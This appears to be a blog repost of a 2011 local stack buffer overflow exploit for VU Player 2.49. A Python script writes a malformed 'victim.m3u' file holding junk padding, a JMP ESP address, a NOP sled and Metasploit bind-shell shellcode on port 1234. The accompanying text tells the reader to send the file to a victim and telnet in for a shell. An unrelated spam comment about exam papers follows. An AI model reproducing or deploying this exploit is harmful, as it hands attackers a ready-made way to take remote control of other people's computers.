VU Player stack buffer overflow Local Exploit

This is VU player stack buffer overflow exploit.This is a local exploit.
When you run this exploit a malformes .m3u file will be generated.
Change the shell code accroding to your purpose.
The shell code i have added is bad character free windows_shell_bind_tcp generated from metasploit frmae work.
If you use this shell code,After victim open the malformed m3u,you just have to telnet thr victim on port 1234 to get shell.

I have submitted the code @ injector vulnerability database
you can also find it @ http://1337day.com/exploits/16741
# Exploit Title: VU Player stack buffer overflow Local Exploit
# Version: 2.49
# Date: 22-08-2011
# Author: Debasish Mandal   http://www.facebook.com/raza.whitehat
# Email debasishm89@gmail.com
# Software Link: http://www.brothersoft.com/vuplayer-62979.html
# Category:: Local
# Tested on: Windows XP SP2.


#!/usr/bin/python
from struct import pack
print "######################################################"
print "##   VU Player Local BO Exploit                     ##"
print "##   http://www.brothersoft.com/vuplayer-62979.html ##"
print "##   Author :: Debasish Mandal                      ##"
print "##   Email : debasishm89@gmail.com                  ##"
print "##   http://www.facebook.com/raza.whitehat          ##"
print "######################################################"
raw_input("Press Enter to generate the crafted m3u...")
f = open('victim.m3u','w')
junk = "A"*1012
eip = pack('<L',0x77D7754A)  # JMP ESP @ USER32.dll
nop = "\x90" *10    # NOPs [To make the exploit smooth]

#Shell Code Starts Here
#List bad characters \x00  \x09   \x0a  \x1a
#Generated form Metasploit Framework
#Name : windows/shell/bind_tcp
#LPORT = 1234
shellcode = ("\xda\xc2\xd9\x74\x24\xf4\xbf\x97\xf8\x9b\xb0\x58\x29\xc9\xb1"
"\x4b\x31\x78\x19\x83\xe8\xfc\x03\x78\x15\x75\x0d\x67\x58\xf0"
"\xee\x98\x99\x62\x66\x7d\xa8\xb0\x1c\xf5\x99\x04\x56\x5b\x12"
"\xef\x3a\x48\xa1\x9d\x92\x7f\x02\x2b\xc5\x4e\x93\x9a\xc9\x1d"
"\x57\xbd\xb5\x5f\x84\x1d\x87\xaf\xd9\x5c\xc0\xd2\x12\x0c\x99"
"\x99\x81\xa0\xae\xdc\x19\xc1\x60\x6b\x21\xb9\x05\xac\xd6\x73"
"\x07\xfd\x47\x08\x4f\xe5\xec\x56\x70\x14\x20\x85\x4c\x5f\x4d"
"\x7d\x26\x5e\x87\x4c\xc7\x50\xe7\x02\xf6\x5c\xea\x5b\x3e\x5a"
"\x15\x2e\x34\x98\xa8\x28\x8f\xe2\x76\xbd\x12\x44\xfc\x65\xf7"
"\x74\xd1\xf3\x7c\x7a\x9e\x70\xda\x9f\x21\x55\x50\x9b\xaa\x58"
"\xb7\x2d\xe8\x7e\x13\x75\xaa\x1f\x02\xd3\x1d\x20\x54\xbb\xc2"
"\x84\x1e\x2e\x16\xbe\x7c\x27\xdb\x8c\x7e\xb7\x73\x87\x0d\x85"
"\xdc\x33\x9a\xa5\x95\x9d\x5d\xc9\x8f\x59\xf1\x34\x30\x99\xdb"
"\xf2\x64\xc9\x73\xd2\x04\x82\x83\xdb\xd0\x04\xd4\x73\x8b\xe4"
"\x84\x33\x7b\x8c\xce\xbb\xa4\xac\xf0\x11\xcd\x1d\xd4\xc9\x9a"
"\x5f\xea\xfc\x06\xd6\x0c\x94\xa6\xbe\x87\x01\x05\xe5\x1f\xb5"
"\x76\xcc\x33\x6e\xe1\x59\x5a\xa8\x0e\x5a\x48\x9a\xa3\xf3\x1b"
"\x69\xa8\xc0\x3a\x6e\xe5\x61\x2a\xf9\x73\xe3\x19\x9b\x84\x2e"
"\xcb\x5b\x11\xd4\x5a\x0b\x8d\xd6\xbb\x7b\x12\x29\xee\xf7\x9b"
"\xbf\x51\x60\xe4\x2f\x52\x70\xb2\x25\x52\x18\x62\x1d\x01\x3d"
"\x6d\x88\x35\xee\xf8\x32\x6c\x42\xaa\x5a\x92\xbd\x9c\xc5\x6d"
"\xe8\x1c\x3a\xb8\xd5\x9a\x4a\xce\x35\x67")
payload = (junk+eip+nop+shellcode)
print "[*]Writinng payload to the file victim.m3u"
f.write(payload)
f.close()
print "[*]Crafted .m3u File generated"
print "[*]Now send the file to victim"
print "[*]Telnet to the victim on port 1234 after execution of this crafted m3u"
print "[*]Exit"


# 1337day.com [2011-08-22

Comments

  1. Bihar School Education Board has released the 12th Question Papers for the year 2022. (BSEB). The question papers from prior years are available in pdf format. Students studying for Inter examinations should practise model or sample papers to gain a sense of the types of BSEB 12th Question Paper 2022 questions that will be asked. They will gain familiarity with the marking structure and amount of questions by solving BSEB 12th Question Paper 2022. Furthermore, completing these Question Papers in the allotted time will aid pupils in boosting their problem-solving speed.

    ReplyDelete

Post a Comment